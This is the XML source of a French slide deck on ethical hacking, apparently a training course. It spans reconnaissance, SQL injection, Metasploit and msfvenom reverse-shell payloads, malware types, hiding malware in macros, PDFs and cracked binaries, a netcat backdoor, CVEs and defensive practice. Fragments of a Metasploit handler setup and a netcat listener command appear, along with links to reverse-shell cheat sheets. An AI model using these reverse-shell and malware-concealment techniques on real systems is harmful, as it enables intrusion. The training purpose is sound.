              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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lhost 192.168.113.133</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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lport 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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exitonsession false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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 -j –z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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Problem Resolution : https://null-byte.wonderhowto.com/forum/problem-with-msfvenom-windows-7-64-bit-exe-version-file-is-not-compatible-0177363/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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DOC2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1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DOC3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://medium.com/securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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1800" b="1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1800" b="1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1800" b="1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1800" b="1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393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C89363-D0CC-0AE5-BFBA-56B195B91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61" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Msfvnom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 local ou vers internet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AFE092-BB01-E6CE-FBA2-83C4C9217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5809" y="1862846"/>
            <a:ext cx="11992947" cy="59219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au victime : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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Sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1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Puis selo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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les machines trouvées : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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Sessions i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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Avec i : le numéro de la machine</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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1800" b="1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Tapez la commande help pour plus d’éclaircissement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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1800" b="1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196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2289C5-B609-B06A-343B-8352B0D76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Base de donnée de CVE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51068A-9E27-AFFE-1406-BD45F05B6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15B57EE-8478-9156-C568-9E46309A0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" y="1964544"/>
            <a:ext cx="12192000" cy="292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221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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="489533"/>
            <a:ext cx="10515600" cy="192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2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lang="fr-FR" sz="4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Les étapes de l’éthique hacking (web, système, application, …) : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4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fr-FR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60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1820701"/>
            <a:ext cx="10787743" cy="4737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Times New Roman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Phase de reconnaissance </a:t>
            </a:r>
            <a:b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Phase de l’exploitation</a:t>
            </a:r>
            <a:b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Phase de post-exploitation</a:t>
            </a:r>
            <a:b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(CYBER KILL CHAIN)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72936B-A6D9-B3B0-D9E6-FDDB230C2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53157"/>
            <a:ext cx="11353800" cy="1325563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Programmes malveillants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DF6CF135-408D-EE4F-2F40-B7F1934F2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Worm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Virus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Trojan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Ransomware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 (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Remote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Access Tools)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Keylogger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Backdoor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30043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4BB79-7A91-D2CF-9433-A88E51FA7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8AF5FC-63E4-08F9-B932-75A94652E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0"/>
            <a:ext cx="11353800" cy="874385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Programmes malveillants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15007F4-0F56-C334-47D1-99BB28C17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6A94907-CCB2-37D7-CBD4-C43E83E0A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832" y="874385"/>
            <a:ext cx="6829168" cy="584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98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E80DF3-8536-3FFF-494C-45023F5C8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FUDDING : Cacher les programmes malveillants dans d’autres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8D095F-8773-4C5C-8DB0-AEDC94A8F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Dans un macro de office par exemple : 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(Lien en description)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Dans un PDF :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(Lien en description)</a:t>
            </a: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Dans un fichier binaire (les cracks surtout et les faux mise à jour des antivirus)  : Pire encore dans un OS (reverse engineering and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injecting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virus on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binaries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710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FF5DD0-A99F-ED39-15AC-50F797BD5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Reverse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shell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avec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netcat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backdoor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95B3B3-70AE-EFEF-03AC-600D4F3C6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Coté attaquant (lien1 en description)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Coté attaquant :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–v –l –p 9001</a:t>
            </a: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Coté cible (lien2 en description)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308537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8D4FA-2248-CEBB-E6A7-C726D789B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2595D2-36BB-4939-4B49-3767FF247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0"/>
            <a:ext cx="11353800" cy="874385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Pièges internautes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689A6A-F0D4-1D8D-0DF0-F2CEF255E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C05B89C-C3DE-529A-4065-34AD809D9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" y="874384"/>
            <a:ext cx="11745613" cy="402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132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52717D-ED87-A755-945A-2DF19A16D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Attaques web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287B0B4-FC5F-EA36-BFA6-0A29DED6F0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750" y="1924050"/>
            <a:ext cx="10727820" cy="2388458"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975925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0108AF-CBC3-CB48-ABB4-831C7900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EXPLOITATION : COMMENT CRÉER DES FAILLES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713333-E4EE-13C9-B988-3E9F510BB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Race condition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Injection (input)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Changement de (output)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Brute forcing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Fuzzing de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protocol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Fuzzing des inputs</a:t>
            </a:r>
          </a:p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Overflow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cf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tuto de processus sur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overflow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overflow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oscp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Reverse engineering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12747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195094-D9EE-3917-8688-E70E40401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Cycle de vie de logiciel &amp; CVE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36B302-F160-60F9-7AE6-42BB54B92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03E7072-15DA-71D1-26AF-98CA33872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845733"/>
            <a:ext cx="8193216" cy="436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571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2D6DF0-DDED-F58A-BB4F-35BF5A51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 CVE et CVS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C62D96-AEE6-00D8-8E9A-6452E145D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Confidentialité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Intégrité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Authenticité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Disfonctionnement ou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denied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service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RCE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 utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857991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156A41-2084-2667-D654-2B9CD5FCD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Endpoint Protection Platform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13E923-341E-AA1A-378F-3E05A0337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Antimalware, pare-feu, IDS, chiffrement</a:t>
            </a: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Détections :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 signature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 comportement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Heuristique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3178687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Times New Roman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Phase de reconnaissance </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p61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Manuelle ou automatisée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Existence des résultats positif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Nécessitant des accords du chef hiérarchique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Attention au hackback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3C4B21-B604-090D-B732-BD49CAD59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0-day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9A89E0-5EE0-C877-FFDE-D62059DF1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6595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BC3FFD-5540-B0B2-C372-4223160E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Bonnes pratiques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9F141B-297C-C2DC-A4F1-58239ED5C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Installation EPP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Sauvegarde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Historisation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13719122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5D9B18-0BD2-676C-292F-01D27ED21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C8595C-DBAA-B936-67D5-F106B4749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21549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F317A0-73CB-0F79-6107-2A306384D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améliorer la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>securité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3CC7BA-7BD1-708B-B50F-7EC8C5213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8E3A6A3-3929-14E0-F0A0-2B0BB7335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45734"/>
            <a:ext cx="10328306" cy="501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414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B824F-C5BB-12DD-511F-05FF0127E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9CADCF-8FA1-A092-774C-BD8B4CB8B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améliorer la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>securité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8B2F42-971C-F69A-4959-6B707465D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83FFD41-C5E4-468C-EA9C-BBF2235B2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59044"/>
            <a:ext cx="6316774" cy="506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778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4FB156-23AC-A58F-08E8-C1B96733B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47384"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Domaine à sécuriser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9CFC5C-135A-7CD5-370C-CEDFA6193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D70F3B7-68D5-9C8B-F0D5-25FCED959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976" y="1413690"/>
            <a:ext cx="8232071" cy="506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9457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69C909-A5C1-04A3-CBBC-BE824ED68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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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593ECB8-764B-36D6-CBBD-AC579FA68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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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BDAFDFF-EBDA-707A-ABAF-1AE691F07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65" y="1383956"/>
            <a:ext cx="11205814" cy="341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128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6249B-8280-58F1-8917-A61BE62DF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57B475-67B1-E081-A9AC-096C218AD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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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466BF44-D971-E3AE-10DE-C43F04C7A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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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6DAF33B-3CB0-C3B7-366D-17EB3E580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62" y="988905"/>
            <a:ext cx="7599406" cy="569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412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E0847-CA93-BB78-1140-D9BAF4CF5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278AB5-84F2-D331-E38E-614E8917C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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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EE2277-BCBA-86C4-B923-1084D3F67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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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B9EE627-96B2-F97B-6D52-2C060A617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" y="1254210"/>
            <a:ext cx="8275166" cy="223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6463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945DC-E2DF-D23E-EEB0-1F026A9EE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B673EE-C5A2-83FF-5EE9-D05166473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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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FFECB3-4DE0-65D0-6E86-61EE2329C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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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6E38EA7-2D0C-77C0-7970-CF9AB6687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1228725"/>
            <a:ext cx="9939433" cy="422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234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Times New Roman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Phase exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p62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Eliminer les faux positifs</a:t>
            </a:r>
            <a:endParaRPr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Nécessitant des accords du chef hiérarchique</a:t>
            </a:r>
            <a:endParaRPr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Sauvegarde obligatoire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118C3-921B-4EAF-1701-20C5A3AFF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04AE69-8848-2488-219D-5A8683063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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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CFD21D-983D-6484-A588-A27177948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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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902A159-AE03-6ED1-8C9A-0B73F820E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61" y="1297459"/>
            <a:ext cx="9593715" cy="483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457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5196B-C34D-F32D-D416-F9BDBDAA8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DCB697-7414-A1C0-5DEC-2D7A6DC4B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762" y="286603"/>
            <a:ext cx="10401918" cy="702303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Typologie des attaques et des attaquants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ACEC24-A03D-379D-9921-903A77F10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65" y="1297459"/>
            <a:ext cx="10488415" cy="4571635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F7B17DC-6FC4-5B00-6538-EB82724D0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140554"/>
            <a:ext cx="8849497" cy="242078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1EC51A6-C038-E5B5-C5D7-AFF234226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0" y="3712988"/>
            <a:ext cx="8651376" cy="222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153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0695D0-ACC9-9B4A-8B0A-FE2F8BAF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21D09F-A917-3E35-E882-E94C860AE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D9F152B-E481-918F-F004-D73EC32F7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50296"/>
            <a:ext cx="9145648" cy="542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6053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964444-BA29-EB26-9BE8-DE16677B8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74E972-5E43-9CAF-050C-F8F7F842E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DE13506-38F7-C902-131D-973C017C1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767535"/>
            <a:ext cx="10072560" cy="531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632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AAC6DA-35A9-37A6-FE5C-8B4450440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DE39C1A-D50F-458B-5A09-09FFE0507A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6805" y="0"/>
            <a:ext cx="10211984" cy="5600120"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19038022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241064-E5C0-20C7-7B22-4E206F787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2CBF6C-7831-41FF-64C1-6D4A54329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5E10DE7-D9BE-1F5D-DE1B-946FCDB7D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" y="286603"/>
            <a:ext cx="10331896" cy="531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4058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6F437F-5349-739D-14F4-C56FDE59C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3B3EC6-B4B5-95AA-AAA5-CFAE7A1A2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2E3753E-E943-21AA-14BE-2B03BC04A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148795"/>
            <a:ext cx="10119360" cy="548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8361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305F95-8BEA-12C0-F400-1E057973D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417E98-D5D6-B575-93CE-8EB0DE004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44F51FC-1EFD-B802-AD27-D5597B18F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79" y="191658"/>
            <a:ext cx="7743979" cy="655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211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A02CCC-97B7-7562-7F0B-39656FE0C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48A92D-9FF3-436B-325A-758313710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C45F0AD-D012-5A2A-0986-6F3A9B424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0700"/>
            <a:ext cx="5721178" cy="52073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7EBC01A-A5D1-B5DA-7BFB-4E00EEE02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1178" y="147405"/>
            <a:ext cx="6353022" cy="469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2340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EA65E7-CFE4-E459-5D62-94F744B05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Audit de la sécurité Interne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4721C8-68AD-92F2-DB23-4A5EE9E6E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370E74D-D858-07C4-912E-5E2524A59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932" y="1845734"/>
            <a:ext cx="6870744" cy="475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45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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="253157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Times New Roman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Outils de reconnaissance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p63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Whois</a:t>
            </a:r>
            <a:endParaRPr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netcraft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Nslookup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Nmap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508F13-DA77-AADF-8004-313FAABAF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Audit de la sécurité Interne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A96F224-9D17-DF6C-6EE4-2BC9449DF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8197489-FA05-F592-283C-C6A86CBDE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1961939"/>
            <a:ext cx="9981248" cy="368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015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783ECA-9598-11B0-5B96-5EE8D35D5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Audit de la sécurité Interne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BB459A-6500-7CDE-8B17-D3E6DA786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2B7128F-E5F8-3DE9-B707-0EA8B3ACD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812" y="1845734"/>
            <a:ext cx="9135289" cy="451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514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A1B7D2-304B-4E33-16FF-D66AA388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(maj)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1E7343-65F8-9697-FC51-75413759B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69597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E268B8-180B-D867-ECC9-A139F9B21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SURETE DE FONCTIONNEMENT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7130702-3364-A9A7-2FAC-F429C0813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0374255-89AB-F4ED-3A46-0CD98DDC3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55" y="1845733"/>
            <a:ext cx="6794826" cy="478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8399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FD1C1-2A88-A35E-BBF2-5DFE9674B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AEC69C-95E7-D531-AEB4-C5E16009E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SURETE DE FONCTIONNEMENT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8052E3-344F-2479-DCF1-881E4792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FC6E7F1-AEDB-5DDA-1E06-3243E9087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45416"/>
            <a:ext cx="7404169" cy="486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5786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62F45-6884-ACDD-066E-D86C87AC6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F211F9-5A96-013C-5CA1-4EE5EB92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SURETE DE FONCTIONNEMENT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F318AA-4273-6646-F33B-39D979AFC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F6976B4-D173-47D1-C42E-39A98CB11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819275"/>
            <a:ext cx="7428882" cy="454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831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33D74D-A989-96BA-08D8-6CFC942A5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SAUVEGARDE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1804EC-5633-3FBC-2FB8-DB517AFC9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2BA841D-35AC-EF0F-95D4-B98C35009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737360"/>
            <a:ext cx="8849909" cy="406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2601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75182-AD3F-10FC-05B2-AD12B67DC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5F1F6A-C755-492B-2D71-A050DAC1D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SAUVEGARDE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2A3813-4468-4BA5-2D3F-6CCBC60E3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F6EF399-0BB6-3D9B-5125-20D6E77C1F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470"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="1845734"/>
            <a:ext cx="7080834" cy="480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091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1CEDF-9526-4ED3-3DD0-A1F0592DA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0D1C2A-E431-3FAA-EACF-BA60B8037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SECURITE DES ACCES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BCD5C1-E661-7C74-2256-F3D35FDC5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A601680-1F12-E40D-E1D3-8E3091D28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49664"/>
            <a:ext cx="11008704" cy="265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151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199DE-D117-DF8D-E8AA-A5F57B02E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58CF45-C08F-CEC7-B05A-1D2886C76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SECURITE DES ACCES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0AD1DBD-E112-597A-26A5-F5BA7FF62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CFF23DB-DA67-BE30-7521-51B6DA6F5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916" y="1845734"/>
            <a:ext cx="7290100" cy="506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341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4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9813736" cy="55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Times New Roman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Injection SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="522" name="Google Shape;522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185698"/>
            <a:ext cx="6536724" cy="3147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3F2BE1-9C25-8E68-9E70-815D40FA4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Pratique intéressante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DA4946-7883-B5B7-C46B-DBF1C51D6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Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Malware analyse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00247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86F0E5-4258-6C4F-A974-3181A1AA5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Certification et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> hacking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9EB1D-1330-CFFC-85E6-DDBBBBDE2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9850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5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9813736" cy="55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Times New Roman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Injection SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="529" name="Google Shape;529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94241"/>
            <a:ext cx="12192000" cy="4469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Times New Roman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Chaîne et requête</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Google Shape;536;p66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537" name="Google Shape;537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" y="2533814"/>
            <a:ext cx="12192000" cy="3026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Times New Roman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Chaîne et requête</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p67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544" name="Google Shape;544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6887" y="1737360"/>
            <a:ext cx="10659762" cy="504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étrospective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2832</TotalTime>
  <Words>1713</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>281</Paragraphs>
  <Slides>61</Slides>
  <Notes>33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61</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="66" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Rétrospective</vt:lpstr>
      <vt:lpstr>Ethical hacking CyberKillChain Attaques/Attaquants   </vt:lpstr>
      <vt:lpstr>Phase de reconnaissance  Phase de l’exploitation Phase de post-exploitation  (CYBER KILL CHAIN)</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance </vt:lpstr>
      <vt:lpstr>Phase exploitation</vt:lpstr>
      <vt:lpstr>Outils de reconnaissance</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>SQL Injection (1)</vt:lpstr>
      <vt:lpstr>SQL Injection (2)</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>Payload reverse shell et binding </vt:lpstr>
      <vt:lpstr>Msfvnom en local</vt:lpstr>
      <vt:lpstr>Msfvnom en local ou vers internet</vt:lpstr>
      <vt:lpstr>Base de donnée de CVE</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>FUDDING : Cacher les programmes malveillants dans d’autres </vt:lpstr>
      <vt:lpstr>Reverse shell avec netcat backdoor</vt:lpstr>
      <vt:lpstr>Pièges internautes</vt:lpstr>
      <vt:lpstr>Attaques web</vt:lpstr>
      <vt:lpstr>EXPLOITATION : COMMENT CRÉER DES FAILLES ?</vt:lpstr>
      <vt:lpstr>Cycle de vie de logiciel &amp; CVE</vt:lpstr>
      <vt:lpstr>Impact CVE et CVS</vt:lpstr>
      <vt:lpstr>Endpoint Protection Platform</vt:lpstr>
      <vt:lpstr>0-day</vt:lpstr>
      <vt:lpstr>Bonnes pratiques</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Comment améliorer la securité</vt:lpstr>
      <vt:lpstr>Comment améliorer la securité</vt:lpstr>
      <vt:lpstr>Domaine à sécuriser</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants</vt:lpstr>
      <vt:lpstr>Typologie des attaques et des attaquants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Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Mise à Jour (maj)</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>Pratique intéressante</vt:lpstr>
      <vt:lpstr>Certification et lab en ethical hacking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Sitraka</dc:creator>
  <cp:lastModifiedBy>Sitraka</cp:lastModifiedBy>
  <cp:revision>236</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-24T07:42:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T01:11:40Z</dcterms:modified>
</cp:coreProperties>
</file>